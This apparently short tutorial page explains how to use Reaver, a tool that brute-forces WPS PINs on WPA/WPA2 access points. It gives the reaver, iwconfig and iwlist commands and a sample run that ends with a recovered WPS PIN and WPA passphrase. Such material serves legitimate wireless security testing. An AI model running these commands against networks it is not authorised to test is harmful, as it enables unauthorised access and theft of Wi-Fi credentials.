Skip to content

Reaver

Reaver is a WPA/WPA2 brute force attack tool developed by Tactical Network Solutions. It exploits a vulnerability in the WPS (Wi-Fi Protected Setup) protocol found in WPA/WPA2 wireless access points.

Usage

reaver -i <interface> -b <access-point> -v

To obtain the interface and access point, use the following commands:

iwconfig
iwlist <interface> scan

Address is what we are going to use in the -b flag.

./reaver -i wlan0 -b 02:00:00:00:01:00 -v

Reaver v1.6.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 02:00:00:00:01:00
[+] Received beacon from 02:00:00:00:01:00
[+] Trying pin "12345670"
[!] Found packet with bad FCS, skipping...
[+] Associated with 02:00:00:00:01:00 (ESSID: ID)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'PASSWORD'
[+] AP SSID: 'ID'